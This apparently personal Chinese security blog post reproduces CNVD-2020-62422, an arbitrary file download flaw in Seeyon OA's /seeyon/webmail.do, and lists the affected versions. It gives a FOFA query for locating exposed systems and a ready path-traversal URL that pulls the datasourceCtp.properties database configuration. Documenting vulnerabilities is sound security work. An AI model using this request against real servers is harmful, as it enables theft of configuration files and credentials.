致远OA webmail.do 任意文件下载 CNVD-2020-62422

漏洞描述

致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息

影响版本

致远OA A6-V5
致远OA A8-V5
致远OA G6

漏洞复现

fofa语法:app="致远互联-OA"
登录页面如下:

致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。
通过修改filePath参数来下载服务器文件
http://www.xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties

更改参数 filePath 可下载其他文件

posted @ 2023-09-04 15:08  学安全的小白  阅读(561)  评论(0编辑  收藏  举报